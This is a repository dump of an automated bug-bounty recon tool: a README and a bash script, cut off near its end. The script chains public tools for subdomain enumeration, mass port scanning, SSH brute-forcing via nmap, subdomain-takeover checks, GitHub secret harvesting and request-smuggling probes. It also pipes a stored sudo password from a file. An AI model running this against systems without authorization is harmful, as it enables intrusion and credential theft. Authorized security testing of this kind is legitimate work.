├── Flow.png ├── README.md ├── scanner.sh └── tools ├── .creds ├── .tokens ├── apps.json ├── fingerprints.json ├── nameservers.txt ├── nmap-bootstrap.xsl └── providers-data.csv /Flow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xspade/Automated-Scanner/089a6ac6555f7ff22bf3d18403db17e8190acf23/Flow.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [![Follow on Twitter](https://img.shields.io/twitter/follow/0xspade.svg?logo=twitter)](https://twitter.com/0xspade) 2 | [![Follow on Twitter](https://img.shields.io/twitter/follow/sumgr0.svg?logo=twitter)](https://twitter.com/sumgr0) 3 | 4 | # Installation 5 | To install the tools below, use the linked GitHub repositories. Just make sure each tool ends up in a directory on your PATH and you're good to go. Feel free to modify this, and feel free not to use it if you don't like it :) 6 | 7 | **ALL CREDIT GOES TO THE AMAZING CREATORS OF THESE WONDERFUL TOOLS :)** 8 | 9 | I can't mention y'all individually because I'm too lazy to do that :D (I'm being honest here) 10 | ## List of tools to be installed 11 | 12 | golang 13 | - amass 14 | - subfinder 15 | - assetfinder 16 | - zcat 17 | - goaltdns 18 | - shuffledns 19 | - dnsprobe 20 | - ffuf 21 | - httprobe 22 | - tko-subs 23 | - subjack 24 | - zdns 25 | - aquatone 26 | - webanalyze 27 | - gau 28 | - getching 29 | - kxss 30 | - dalfox 31 | 32 | APT-GET 33 | - jq 34 | - grepcidr 35 | - nmap 36 | - masscan 37 | - brutespray 38 | 39 | Download Only 40 | - findomain 41 | - github-endpoints 42 | - github-secrets 43 | - smuggler 44 | 45 | GIT 46 | - massdns 47 | - S3Scanner 48 | - LinkFinder 49 | - defparam smuggler 50 | 51 | PIP 52 | - shodan 53 | 54 | # How to use 55 | 56 | Usage: `~$ bash scanner.sh example.com` 57 | 58 | Running in the background on a VPS using nohup 59 | 60 | Usage: `~$ nohup 
bash scanner.sh example.com &> example.out&` 61 | 62 | 63 | ### Need a DigitalOcean? 64 | 65 | Free $100 in DigitalOcean credit, just click the link below :D 66 | 67 | [![DigitalOcean Referral Badge](https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg)](https://www.digitalocean.com/?refcode=9d633afb889b&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge) 68 | 69 | ## Contributor 70 | 71 | Big thanks to [@sumgr0](https://twitter.com/sumgr0) :) 72 | 73 | ## Links 74 | 75 | ---- 76 | **Subdomain Enumeration** 77 | * [Amass](https://github.com/OWASP/Amass) brute with [wordlist](https://github.com/ZephrFish/Wordlists/blob/master/HugeDNS.7z) 78 | * [Findomain](https://github.com/Edu4rdSHL/findomain) 79 | * [Subfinder](https://github.com/subfinder/subfinder) 80 | * [Assetfinder](https://github.com/tomnomnom/assetfinder) 81 | * [Rapid7's Project Sonar](https://opendata.rapid7.com/sonar.fdns_v2/) 82 | >https://github.com/phspade/Project_Sonar_R7 83 | * [goaltdns](https://github.com/subfinder/goaltdns) + [massdns](https://github.com/blechschmidt/massdns) 84 | 85 | **Scan All Alive Hosts with [Httprobe](https://github.com/tomnomnom/httprobe)** 86 | 87 | * Getting all IPs from the collected subdomains with [DNSProbe](https://github.com/projectdiscovery/dnsprobe) 88 | 89 | **Separating Cloudflare, Incapsula, Sucuri, and Akamai IPs from collected IPs** 90 | >It's useless to scan Cloudflare, Incapsula, Sucuri, and Akamai IPs. 
*(Just like talking to a wall)* 91 | > 92 | >FYI, install grepcidr first: `apt-get install grepcidr` 93 | 94 | * S3 Bucket scanner with [s3scanner](https://github.com/sa7mon/S3Scanner) 95 | 96 | **Subdomain TakeOver** 97 | * [tko-subs](https://github.com/anshumanbh/tko-subs) 98 | * [Subjack](https://github.com/haccer/subjack) 99 | 100 | **Collecting Endpoints through [Linkfinder](https://github.com/GerbenJavado/LinkFinder/)** 101 | 102 | **Collecting [Endpoints](https://github.com/gwen001/github-search/blob/master/github-endpoints.py) and [Secrets](https://github.com/gwen001/github-search/blob/master/github-secrets.py) on GitHub** 103 | >make sure to create a `.tokens` file *(containing your GitHub token)* together with `github-endpoints.py` and `github-secrets.py` *(probably in the ~/tools folder)*. 104 | 105 | **[HTTP Request Smuggler](https://github.com/gwen001/pentest-tools/blob/master/smuggler.py)** 106 | 107 | **[ZDNS](https://github.com/zmap/zdns)** 108 | 109 | **[Shodan](https://cli.shodan.io/)** 110 | 111 | **[Aquatone](https://github.com/michenriksen/aquatone)** 112 | 113 | **Port Scanning** 114 | * NMAP 115 | * masscan 116 | 117 | **[Webanalyze](https://github.com/rverton/webanalyze) for Fingerprinting assets** 118 | 119 | **File/Dir Discovery** 120 | * [gau](https://github.com/lc/gau) + [getching](https://github.com/phspade/getching) 121 | 122 | **Potential XSS** 123 | * [kxss](https://github.com/tomnomnom/hacks/tree/master/kxss) 124 | 125 | * [dalfox](https://github.com/hahwul/dalfox) 126 | 127 | **[Virtual Hosts](https://github.com/ffuf/ffuf) Scan** 128 | 129 | * 401 Basic Authorization Bruteforce with FFUF 130 | >Some subdomains have 401 HTTP Basic authentication, so we need to brute-force them with base64-encoded credentials :) 131 | 132 | * [FFUF](https://github.com/ffuf/ffuf) 133 | 134 | >Added **X-Forwarded-For Header** *(you should [set up your own DNS server](https://medium.com/@spade.com/a-noob-guide-to-setup-your-own-oob-dns-server-870d9e05b54a))* to check for IP 
spoofing attacks. 135 | 136 | Feel free to modify it on your own if you don't like how it works :) 137 | 138 | -------------------------------------------------------------------------------- /scanner.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | passwordx=$(cat ~/tools/.creds | grep password | awk {'print $3'}) 4 | dns_server=$(cat ~/tools/.creds | grep 'dns_server' | awk {'print $3'}) 5 | xss_hunter=$(cat ~/tools/.creds | grep 'xss_hunter' | awk {'print $3'}) 6 | 7 | [ ! -d ~/recon ] && mkdir ~/recon 2>/dev/null 8 | [ ! -d ~/recon/$1 ] && mkdir ~/recon/$1 2>/dev/null 9 | [ ! -d ~/recon/$1/webanalyze ] && mkdir ~/recon/$1/webanalyze 2>/dev/null 10 | [ ! -d ~/recon/$1/aquatone ] && mkdir ~/recon/$1/aquatone 2>/dev/null 11 | [ ! -d ~/recon/$1/shodan ] && mkdir ~/recon/$1/shodan 2>/dev/null 12 | [ ! -d ~/recon/$1/dirsearch ] && mkdir ~/recon/$1/dirsearch 2>/dev/null 13 | [ ! -d ~/recon/$1/virtual-hosts ] && mkdir ~/recon/$1/virtual-hosts 2>/dev/null 14 | [ ! -d ~/recon/$1/endpoints ] && mkdir ~/recon/$1/endpoints 2>/dev/null 15 | [ ! -d ~/recon/$1/github-endpoints ] && mkdir ~/recon/$1/github-endpoints 2>/dev/null 16 | [ ! -d ~/recon/$1/github-secrets ] && mkdir ~/recon/$1/github-secrets 2>/dev/null 17 | [ ! -d ~/recon/$1/gau ] && mkdir ~/recon/$1/gau 2>/dev/null 18 | [ ! -d ~/recon/$1/kxss ] && mkdir ~/recon/$1/kxss 2>/dev/null 19 | [ ! -d ~/recon/$1/http-desync ] && mkdir ~/recon/$1/http-desync 2>/dev/null 20 | [ ! 
-d ~/recon/$1/401 ] && mkdir ~/recon/$1/401 2>/dev/null 21 | sleep 5 22 | 23 | folder=$1 24 | 25 | message () { 26 | telegram_bot=$(cat ~/tools/.creds | grep "telegram_bot" | awk {'print $3'}) 27 | telegram_id=$(cat ~/tools/.creds | grep "telegram_id" | awk {'print $3'}) 28 | alert="https://api.telegram.org/bot$telegram_bot/sendmessage?chat_id=$telegram_id&text=" 29 | [ -z $telegram_bot ] && [ -z $telegram_id ] || curl -g $alert$1 --silent > /dev/null 30 | } 31 | 32 | scanned () { 33 | cat $1 | sort -u | wc -l 34 | } 35 | 36 | message "[%2B]%20Initiating%20scan%20%3A%20$1%20[%2B]" 37 | date 38 | 39 | [ ! -f ~/tools/nameservers.txt ] && wget https://public-dns.info/nameservers.txt -O ~/tools/nameservers.txt 40 | 41 | if [ ! -f ~/recon/$1/$1-final.txt ]; then 42 | echo "[+] AMASS SCANNING [+]" 43 | if [ ! -f ~/recon/$1/$1-amass.txt ] && [ ! -z $(which amass) ]; then 44 | amass enum -brute -w ~/tools/EnormousDNS.txt -rf ~/tools/nameservers.txt -d $1 -o ~/recon/$1/$1-amass.txt 45 | amasscan=$(scanned ~/recon/$1/$1-amass.txt) 46 | message "Amass%20Found%20$amasscan%20subdomain(s)%20for%20$1" 47 | echo "[+] Amass Found $amasscan subdomains" 48 | else 49 | message "[-]%20Skipping%20Amass%20Scanning%20for%20$1" 50 | echo "[!] Skipping ..." 51 | fi 52 | sleep 5 53 | 54 | echo "[+] FINDOMAIN SCANNING [+]" 55 | if [ ! -f ~/recon/$1/$1-findomain.txt ] && [ ! -z $(which findomain) ]; then 56 | findomain -t $1 -q -u ~/recon/$1/$1-findomain.txt 57 | findomainscan=$(scanned ~/recon/$1/$1-findomain.txt) 58 | message "Findomain%20Found%20$findomainscan%20subdomain(s)%20for%20$1" 59 | echo "[+] Findomain Found $findomainscan subdomains" 60 | else 61 | message "[-]%20Skipping%20Findomain%20Scanning%20for%20$1" 62 | echo "[!] Skipping ..." 63 | fi 64 | sleep 5 65 | 66 | echo "[+] SUBFINDER SCANNING [+]" 67 | if [ ! -f ~/recon/$1/$1-subfinder.txt ] && [ ! 
-z $(which subfinder) ]; then 68 | subfinder -d $1 -nW -silent -rL ~/tools/nameservers.txt -o ~/recon/$1/$1-subfinder.txt 69 | subfinderscan=$(scanned ~/recon/$1/$1-subfinder.txt) 70 | message "SubFinder%20Found%20$subfinderscan%20subdomain(s)%20for%20$1" 71 | echo "[+] Subfinder Found $subfinderscan subdomains" 72 | else 73 | message "[-]%20Skipping%20Subfinder%20Scanning%20for%20$1" 74 | echo "[!] Skipping ..." 75 | fi 76 | sleep 5 77 | 78 | echo "[+] ASSETFINDER SCANNING [+]" 79 | if [ ! -f ~/recon/$1/$1-assetfinder.txt ] && [ ! -z $(which assetfinder) ]; then 80 | assetfinder -subs-only $1 > ~/recon/$1/$1-assetfinder.txt 81 | assetfinderscan=$(scanned ~/recon/$1/$1-assetfinder.txt) 82 | message "Assetfinder%20Found%20$assetfinderscan%20subdomain(s)%20for%20$1" 83 | echo "[+] Assetfinder Found $assetfinderscan subdomains" 84 | else 85 | message "[-]%20Skipping%20Assetfinder%20Scanning%20for%20$1" 86 | echo "[!] Skipping ..." 87 | fi 88 | sleep 5 89 | 90 | echo "[+] SCANNING SUBDOMAINS WITH PROJECT SONAR [+]" 91 | if [ ! -f ~/recon/$1/$1-project-sonar.txt ] && [ -e ~/tools/forward_dns.any.json.gz ]; then 92 | zcat ~/tools/forward_dns.any.json.gz | grep -E "\.$1\"," | jq -r '.name' | sort -u >> ~/recon/$1/$1-project-sonar.txt 93 | projectsonar=$(scanned ~/recon/$1/$1-project-sonar.txt) 94 | message "Project%20Sonar%20Found%20$projectsonar%20subdomain(s)%20for%20$1" 95 | echo "[+] Project Sonar Found $projectsonar subdomains" 96 | else 97 | message "[-]%20Skipping%20Project%20Sonar%20Scanning%20for%20$1" 98 | echo "[!] Skipping ..." 
99 | fi 100 | sleep 5 101 | 102 | ## Merging all results into one file, then deleting the per-tool output to reduce disk usage 103 | cat ~/recon/$1/$1-amass.txt ~/recon/$1/$1-project-sonar.txt ~/recon/$1/$1-findomain.txt ~/recon/$1/$1-subfinder.txt ~/recon/$1/$1-assetfinder.txt | sort -uf > ~/recon/$1/$1-final.txt 104 | rm ~/recon/$1/$1-amass.txt ~/recon/$1/$1-project-sonar.txt ~/recon/$1/$1-findomain.txt ~/recon/$1/$1-subfinder.txt ~/recon/$1/$1-assetfinder.txt 105 | sleep 5 106 | 107 | fi 108 | 109 | if [ ! -f ~/recon/$1/$1-final.txt ]; then 110 | exit 1 111 | fi 112 | 113 | echo "[+] GOALTDNS SUBDOMAIN PERMUTATION [+]" 114 | if [ ! -f ~/recon/$1/$1-goaltdns.txt ] && [ ! -z $(which goaltdns) ]; then 115 | goaltdns -l ~/recon/$1/$1-final.txt -w ~/tools/subs.txt | massdns -r ~/tools/nameservers.txt -o J --flush 2>/dev/null | jq -r '.name' >> ~/recon/$1/$1-goaltdns.tmp 116 | cat ~/recon/$1/$1-goaltdns.tmp | sed 's/\.$//g' | sort -u >> ~/recon/$1/$1-goaltdns.txt 117 | rm ~/recon/$1/$1-goaltdns.tmp 118 | goaltdns=$(scanned ~/recon/$1/$1-goaltdns.txt) 119 | message "goaltdns%20generated%20$goaltdns%20subdomain(s)%20for%20$1" 120 | echo "[+] goaltdns generated $goaltdns subdomains" 121 | else 122 | message "[-]%20Skipping%20goaltdns%20Scanning%20for%20$1" 123 | echo "[!] Skipping ..." 124 | fi 125 | sleep 5 126 | 127 | echo "[+] ELIMINATING WILDCARD SUBDOMAINS [+]" 128 | if [ ! -f ~/recon/$1/$1-non-wildcards.txt ] && [ ! -z $(which shuffledns) ] && [ ! -z $(which dnsprobe) ]; then 129 | cat ~/recon/$1/$1-goaltdns.txt ~/recon/$1/$1-final.txt | sed 's/\.$//g' | shuffledns -d $1 -r ~/tools/nameservers.txt | dnsprobe -r A | awk {'print $1'} | sort -u >> ~/recon/$1/$1-non-wildcards.txt 130 | rm ~/recon/$1/$1-final.txt && mv ~/recon/$1/$1-non-wildcards.txt ~/recon/$1/$1-final.txt 131 | message "Done%20Eliminating%20wildcard%20subdomains!" 132 | else 133 | message "[-]%20Skipping%20shuffledns%20and%20dnsprobe%20Scanning%20for%20$1" 134 | echo "[!] Skipping ..." 
135 | fi 136 | sleep 5 137 | 138 | all=$(scanned ~/recon/$1/$1-final.txt) 139 | message "Almost%20$all%20Collected%20Subdomains%20for%20$1" 140 | echo "[+] $all collected subdomains" 141 | sleep 3 142 | 143 | # collecting all IPs from the collected subdomains 144 | echo "[+] Getting all IP from subdomains [+]" 145 | if [ ! -f ~/recon/$1/$1-ipz.txt ] && [ ! -z $(which dnsprobe) ]; then 146 | cat ~/recon/$1/$1-final.txt | dnsprobe | awk {'print $2'} | sort -u > ~/recon/$1/$1-ipz.txt 147 | rm ~/recon/$1/$1-goaltdns.txt 148 | ipcount=$(scanned ~/recon/$1/$1-ipz.txt) 149 | message "Almost%20$ipcount%20IP%20Collected%20in%20$1" 150 | echo "[+] $ipcount collected IPs" 151 | else 152 | message "[-]%20Skipping%20dnsprobe%20Scanning%20for%20$1" 153 | echo "[!] Skipping ..." 154 | fi 155 | 156 | ## segregating cloudflare IPs from non-cloudflare IPs 157 | ## no sense in scanning cloudflare, sucuri, akamai and incapsula IPs. :( 158 | iprange="173.245.48.0/20 103.21.244.0/22 103.22.200.0/22 103.31.4.0/22 141.101.64.0/18 108.162.192.0/18 190.93.240.0/20 188.114.96.0/20 197.234.240.0/22 198.41.128.0/17 162.158.0.0/15 104.16.0.0/12 172.64.0.0/13 131.0.72.0/22" 159 | for ip in $(cat ~/recon/$1/$1-ipz.txt); do 160 | grepcidr "$iprange" <(echo "$ip") >/dev/null && echo "[!] $ip is cloudflare" || echo "$ip" >> ~/recon/$1/$1-ip4.txt 161 | done 162 | ipz=$(scanned ~/recon/$1/$1-ip4.txt) 163 | ip_old=$(scanned ~/recon/$1/$1-ipz.txt) 164 | message "$ipz%20non-cloudflare%20IPs%20have%20been%20collected%20in%20$1%20out%20of%20$ip_old%20IPs" 165 | echo "[+] $ipz non-cloudflare IPs have been collected out of $ip_old IPs!" 166 | rm ~/recon/$1/$1-ipz.txt 167 | sleep 5 168 | 169 | incapsula="199.83.128.0/21 198.143.32.0/19 149.126.72.0/21 103.28.248.0/22 45.64.64.0/22 185.11.124.0/22 192.230.64.0/18 107.154.0.0/16 45.60.0.0/16 45.223.0.0/16" 170 | for ip in $(cat ~/recon/$1/$1-ip4.txt); do 171 | grepcidr "$incapsula" <(echo "$ip") >/dev/null && echo "[!] 
$ip is Incapsula" || echo "$ip" >> ~/recon/$1/$1-ip3.txt 172 | done 173 | ipz=$(scanned ~/recon/$1/$1-ip3.txt) 174 | ip_old=$(scanned ~/recon/$1/$1-ip4.txt) 175 | message "$ipz%20non-incapsula%20IPs%20have%20been%20collected%20in%20$1%20out%20of%20$ip_old%20IPs" 176 | echo "[+] $ipz non-incapsula IPs have been collected out of $ip_old IPs!" 177 | rm ~/recon/$1/$1-ip4.txt 178 | sleep 5 179 | 180 | sucuri="185.93.228.0/24 185.93.229.0/24 185.93.230.0/24 185.93.231.0/24 192.124.249.0/24 192.161.0.0/24 192.88.134.0/24 192.88.135.0/24 193.19.224.0/24 193.19.225.0/24 66.248.200.0/24 66.248.201.0/24 66.248.202.0/24 66.248.203.0/24" 181 | for ip in $(cat ~/recon/$1/$1-ip3.txt); do 182 | grepcidr "$sucuri" <(echo "$ip") >/dev/null && echo "[!] $ip is Sucuri" || echo "$ip" >> ~/recon/$1/$1-ip2.txt 183 | done 184 | ipz=$(scanned ~/recon/$1/$1-ip2.txt) 185 | ip_old=$(scanned ~/recon/$1/$1-ip3.txt) 186 | message "$ipz%20non-sucuri%20IPs%20have%20been%20collected%20in%20$1%20out%20of%20$ip_old%20IPs" 187 | echo "[+] $ipz non-sucuri IPs have been collected out of $ip_old IPs!" 188 | rm ~/recon/$1/$1-ip3.txt 189 | sleep 5 190 | 191 | akamai="104.101.221.0/24 184.51.125.0/24 184.51.154.0/24 184.51.157.0/24 184.51.33.0/24 2.16.36.0/24 2.16.37.0/24 2.22.226.0/24 2.22.227.0/24 2.22.60.0/24 23.15.12.0/24 23.15.13.0/24 23.209.105.0/24 23.62.225.0/24 23.74.29.0/24 23.79.224.0/24 23.79.225.0/24 23.79.226.0/24 23.79.227.0/24 23.79.229.0/24 23.79.230.0/24 23.79.231.0/24 23.79.232.0/24 23.79.233.0/24 23.79.235.0/24 23.79.237.0/24 23.79.238.0/24 23.79.239.0/24 63.208.195.0/24 72.246.0.0/24 72.246.1.0/24 72.246.116.0/24 72.246.199.0/24 72.246.2.0/24 72.247.150.0/24 72.247.151.0/24 72.247.216.0/24 72.247.44.0/24 72.247.45.0/24 80.67.64.0/24 80.67.65.0/24 80.67.70.0/24 80.67.73.0/24 88.221.208.0/24 88.221.209.0/24 96.6.114.0/24" 192 | for ip in $(cat ~/recon/$1/$1-ip2.txt); do 193 | grepcidr "$akamai" <(echo "$ip") >/dev/null && echo "[!] 
$ip is Akamai" || echo "$ip" >> ~/recon/$1/$1-ip.txt 194 | done 195 | ipz=$(scanned ~/recon/$1/$1-ip.txt) 196 | ip_old=$(scanned ~/recon/$1/$1-ip2.txt) 197 | message "$ipz%20non-akamai%20IPs%20have%20been%20collected%20in%20$1%20out%20of%20$ip_old%20IPs" 198 | echo "[+] $ipz non-akamai IPs have been collected out of $ip_old IPs!" 199 | rm ~/recon/$1/$1-ip2.txt 200 | sleep 5 201 | 202 | echo "[+] MASSCAN PORT SCANNING [+]" 203 | if [ ! -f ~/recon/$1/$1-masscan.txt ] && [ ! -z $(which masscan) ]; then 204 | echo $passwordx | sudo -S masscan -p0-65535 -iL ~/recon/$1/$1-ip.txt --max-rate 1000 -oG ~/recon/$1/$1-masscan.txt 205 | mass=$(cat ~/recon/$1/$1-masscan.txt | grep "Host:" | awk {'print $5'} | awk -F '/' {'print $1'} | sort -u | wc -l) 206 | message "Masscan%20discovered%20$mass%20open%20port(s)%20for%20$1" 207 | echo "[+] Done masscan for scanning port(s)" 208 | else 209 | message "[-]%20Skipping%20Masscan%20Scanning%20for%20$1" 210 | echo "[!] Skipping ..." 211 | fi 212 | sleep 5 213 | 214 | big_ports=$(cat ~/recon/$1/$1-masscan.txt | grep "Host:" | awk {'print $5'} | awk -F '/' {'print $1'} | sort -u | paste -s -d ',') 215 | cat ~/recon/$1/$1-masscan.txt | grep "Host:" | awk {'print $2":"$5'} | awk -F '/' {'print $1'} | sed 's/:80$//g' | sed 's/:443$//g' | sort -u > ~/recon/$1/$1-open-ports.txt 216 | cat ~/recon/$1/$1-open-ports.txt ~/recon/$1/$1-final.txt > ~/recon/$1/$1-all.txt 217 | 218 | echo "[+] HTTProbe Scanning Alive Hosts [+]" 219 | if [ ! -f ~/recon/$1/$1-httprobe.txt ] && [ ! -z $(which httprobe) ]; then 220 | cat ~/recon/$1/$1-all.txt | httprobe -c 100 >> ~/recon/$1/$1-httprobe.txt 221 | alivesu=$(scanned ~/recon/$1/$1-httprobe.txt) 222 | message "$alivesu%20alive%20domains%20out%20of%20$all%20domains%20in%20$1" 223 | echo "[+] $alivesu alive domains out of $all domains/IPs using httprobe" 224 | else 225 | message "[-]%20Skipping%20httprobe%20Scanning%20for%20$1" 226 | echo "[!] Skipping ..." 
227 | fi 228 | sleep 5 229 | 230 | cat ~/recon/$1/$1-httprobe.txt | sed 's/http\(.?*\)*:\/\///g' | sort -u > ~/recon/$1/$1-alive.txt 231 | 232 | echo "[+] S3 Bucket Scanner [+]" 233 | if [ -f ~/tools/S3Scanner/s3scanner.py ]; then 234 | python ~/tools/S3Scanner/s3scanner.py ~/recon/$1/$1-alive.txt &> ~/recon/$1/$1-s3scanner.txt 235 | esthree=$(cat ~/recon/$1/$1-s3scanner.txt | grep "\[found\]" | wc -l) 236 | message "S3Scanner%20found%20$esthree%20buckets%20for%20$1" 237 | echo "[+] Done s3scanner for $1" 238 | else 239 | message "[-]%20Skipping%20s3scanner%20Scanning%20for%20$1" 240 | echo "[!] Skipping ..." 241 | fi 242 | 243 | echo "[+] TKO-SUBS for Subdomain TKO [+]" 244 | if [ ! -f ~/recon/$1/$1-tkosubs.txt ] && [ ! -z $(which tko-subs) ]; then 245 | [ ! -f ~/tools/providers-data.csv ] && wget "https://raw.githubusercontent.com/anshumanbh/tko-subs/master/providers-data.csv" -O ~/tools/providers-data.csv 246 | tko-subs -domains=$HOME/recon/$1/$1-alive.txt -data=$HOME/tools/providers-data.csv -output=$HOME/recon/$1/$1-tkosubs.txt 247 | message "TKO-Subs%20scanner%20done%20for%20$1" 248 | echo "[+] TKO-Subs scanner is done" 249 | else 250 | message "[-]%20Skipping%20tko-subs%20Scanning%20for%20$1" 251 | echo "[!] Skipping ..." 252 | fi 253 | sleep 5 254 | 255 | echo "[+] SUBJACK for Subdomain TKO [+]" 256 | if [ ! -f ~/recon/$1/$1-subjack.txt ] && [ ! -z $(which subjack) ]; then 257 | [ ! 
-f ~/tools/fingerprints.json ] && wget "https://raw.githubusercontent.com/haccer/subjack/master/fingerprints.json" -O ~/tools/fingerprints.json 258 | subjack -w ~/recon/$1/$1-alive.txt -a -timeout 15 -c ~/tools/fingerprints.json -v -m -o ~/recon/$1/$1-subtemp.txt 259 | subjack -w ~/recon/$1/$1-alive.txt -a -timeout 15 -c ~/tools/fingerprints.json -v -m -ssl -o ~/recon/$1/$1-subtmp.txt 260 | cat ~/recon/$1/$1-subtemp.txt ~/recon/$1/$1-subtmp.txt | sort -u > ~/recon/$1/$1-subjack.txt 261 | rm ~/recon/$1/$1-subtemp.txt ~/recon/$1/$1-subtmp.txt 262 | message "subjack%20scanner%20done%20for%20$1" 263 | echo "[+] Subjack scanner is done" 264 | else 265 | message "[-]%20Skipping%20subjack%20Scanning%20for%20$1" 266 | echo "[!] Skipping ..." 267 | fi 268 | sleep 5 269 | 270 | echo "[+] COLLECTING ENDPOINTS [+]" 271 | if [ -f ~/tools/LinkFinder/linkfinder.py ]; then 272 | for urlz in $(cat ~/recon/$1/$1-httprobe.txt); do 273 | filename=$(echo $urlz | sed 's/http:\/\///g' | sed 's/https:\/\//ssl-/g') 274 | link=$(python ~/tools/LinkFinder/linkfinder.py -i $urlz -d -o cli | grep -E "\.js$" | grep "$1" | grep "Running against:" | awk {'print $3'}) 275 | echo "Running against: $urlz" 276 | if [[ ! -z $link ]]; then 277 | for linx in $link; do 278 | python ~/tools/LinkFinder/linkfinder.py -i $linx -o cli > ~/recon/$1/endpoints/$filename-result.txt 279 | done 280 | else 281 | python ~/tools/LinkFinder/linkfinder.py -i $urlz -d -o cli > ~/recon/$1/endpoints/$filename-result.txt 282 | fi 283 | done 284 | message "Done%20collecting%20endpoints%20in%20$1" 285 | echo "[+] Done collecting endpoints" 286 | else 287 | message "[-]%20Skipping%20linkfinder%20Scanning%20for%20$1" 288 | echo "[!] Skipping ..." 
289 | fi 290 | sleep 5 291 | 292 | echo "[+] COLLECTING ENDPOINTS FROM GITHUB [+]" 293 | if [ -e ~/tools/.tokens ] && [ -f ~/tools/.tokens ] && [ -f ~/tools/github-endpoints.py ]; then 294 | for url in $(cat ~/recon/$1/$1-alive.txt); do 295 | echo "Running against: $url" 296 | python3 ~/tools/github-endpoints.py -d $url -s -r -t $(cat ~/tools/.tokens) > ~/recon/$1/github-endpoints/$url.txt 297 | sleep 7 298 | done 299 | message "Done%20collecting%20github%20endpoint%20in%20$1" 300 | echo "[+] Done collecting github endpoint" 301 | else 302 | message "Skipping%20github-endpoint%20script%20in%20$1" 303 | echo "[!] Skipping ..." 304 | fi 305 | sleep 5 306 | 307 | echo "[+] COLLECTING SECRETS FROM GITHUB [+]" 308 | if [ -e ~/tools/.tokens ] && [ -f ~/tools/.tokens ] && [ -f ~/tools/github-secrets.py ]; then 309 | for url in $(cat ~/recon/$1/$1-alive.txt ); do 310 | u=$(echo $url | sed 's/\./\\./g'); 311 | echo "Running against: $url" 312 | python3 ~/tools/github-secrets.py -s $u -t $(cat ~/tools/.tokens) > ~/recon/$1/github-secrets/$url.txt 313 | sleep 7 314 | done 315 | message "Done%20collecting%20github%20secrets%20in%20$1" 316 | echo "[+] Done collecting github secrets" 317 | else 318 | message "Skipping%20github-secrets%20script%20in%20$1" 319 | echo "[!] Skipping ..." 320 | fi 321 | sleep 5 322 | 323 | echo "[+] HTTP SMUGGLING SCANNING [+]" 324 | if [ -f ~/tools/smuggler.py ]; then 325 | for url in $(cat ~/recon/$1/$1-httprobe.txt); do 326 | filename=$(echo $url | sed 's/http:\/\///g' | sed 's/https:\/\//ssl-/g') 327 | echo "Running against: $url" 328 | python3 ~/tools/smuggler.py -u "$url/" -v 1 &> ~/recon/$1/http-desync/$filename.txt 329 | done 330 | message "Done%20scanning%20of%20request%20smuggling%20in%20$1" 331 | echo "[+] Done scanning of request smuggling" 332 | else 333 | message "Skipping%20scanning%20of%20request%20smuggling%20in%20$1" 334 | echo "[!] Skipping ..." 335 | fi 336 | sleep 5 337 | 338 | echo "[+] ZDNS SCANNING [+]" 339 | if [ ! 
-z $(which zdns) ]; then 340 | for i in $(cat ~/recon/$1/$1-alive.txt);do echo $i | zdns ANY -output-file - | jq -r '"Name: "+.name+"\t\t Protocol: "+.data.protocol+"\t Resolver: "+.data.resolver+"\t Status: "+.status' >> ~/recon/$1/$1-zdns.txt;done 341 | message "Done%20ZDNS%20Scanning%20for%20$1" 342 | echo "[+] Done ZDNS for scanning assets" 343 | else 344 | message "Skipping%20scanning%20of%20ZDNS%20in%20$1" 345 | echo "[!] Skipping ..." 346 | fi 347 | sleep 5 348 | 349 | echo "[+] SHODAN HOST SCANNING [+]" 350 | if [ ! -z $(which shodan) ]; then 351 | for ip in $(cat ~/recon/$1/$1-ip.txt); do filename=$(echo $ip | sed 's/\./_/g');shodan host $ip > ~/recon/$1/shodan/$filename.txt; done 352 | message "Done%20Shodan%20for%20$1" 353 | echo "[+] Done shodan" 354 | else 355 | message "[-]%20Skipping%20Shodan%20for%20$1" 356 | echo "[!] Skipping ..." 357 | fi 358 | sleep 5 359 | 360 | echo "[+] AQUATONE SCREENSHOT [+]" 361 | if [ ! -z $(which aquatone) ]; then 362 | cat ~/recon/$1/$1-httprobe.txt | aquatone -ports $big_ports -out ~/recon/$1/aquatone 363 | message "Done%20Aquatone%20for%20Screenshot%20for%20$1" 364 | echo "[+] Done aquatone for screenshot of Alive assets" 365 | else 366 | message "[-]%20Skipping%20Aquatone%20Screenshot%20for%20$1" 367 | echo "[!] Skipping ..." 368 | fi 369 | sleep 5 370 | 371 | echo "[+] NMAP PORT SCANNING [+]" 372 | if [ ! -f ~/recon/$1/$1-nmap.txt ] && [ ! -z $(which nmap) ]; then 373 | [ ! 
-f ~/tools/nmap-bootstrap.xsl ] && wget "https://raw.githubusercontent.com/honze-net/nmap-bootstrap-xsl/master/nmap-bootstrap.xsl" -O ~/tools/nmap-bootstrap.xsl 374 | echo $passwordx | sudo -S nmap -sSVC -A -O -Pn -p$big_ports -iL ~/recon/$1/$1-ip.txt --script http-enum,http-title,ssh-brute --stylesheet ~/tools/nmap-bootstrap.xsl -oA ~/recon/$1/$1-nmap 375 | nmaps=$(scanned ~/recon/$1/$1-ip.txt) 376 | xsltproc -o ~/recon/$1/$1-nmap.html ~/tools/nmap-bootstrap.xsl ~/recon/$1/$1-nmap.xml 377 | message "Nmap%20Scanned%20$nmaps%20IPs%20for%20$1" 378 | echo "[+] Done nmap for scanning IPs" 379 | else 380 | message "[-]%20Skipping%20Nmap%20Scanning%20for%20$1" 381 | echo "[!] Skipping ..." 382 | fi 383 | sleep 5 384 | 385 | echo "[+] WEBANALYZE SCANNING FOR FINGERPRINTING [+]" 386 | if [ ! -z $(which webanalyze) ]; then 387 | [ ! -f ~/tools/apps.json ] && wget "https://raw.githubusercontent.com/AliasIO/Wappalyzer/master/src/apps.json" -O ~/tools/apps.json 388 | for target in $(cat ~/recon/$1/$1-httprobe.txt); do 389 | filename=$(echo $target | sed 's/http\(.?*\)*:\/\///g') 390 | webanalyze -host $target -apps ~/tools/apps.json -output csv > ~/recon/$1/webanalyze/$filename.txt 391 | sleep 5 392 | done 393 | message "Done%20webanalyze%20for%20fingerprinting%20$1" 394 | echo "[+] Done webanalyze for fingerprinting the assets!" 395 | else 396 | message "[-]%20Skipping%20webanalyze%20for%20fingerprinting%20$1" 397 | echo "[!] Skipping ..." 398 | fi 399 | sleep 5 400 | 401 | echo "[+] ALIENVAULT, WAYBACKURLS and 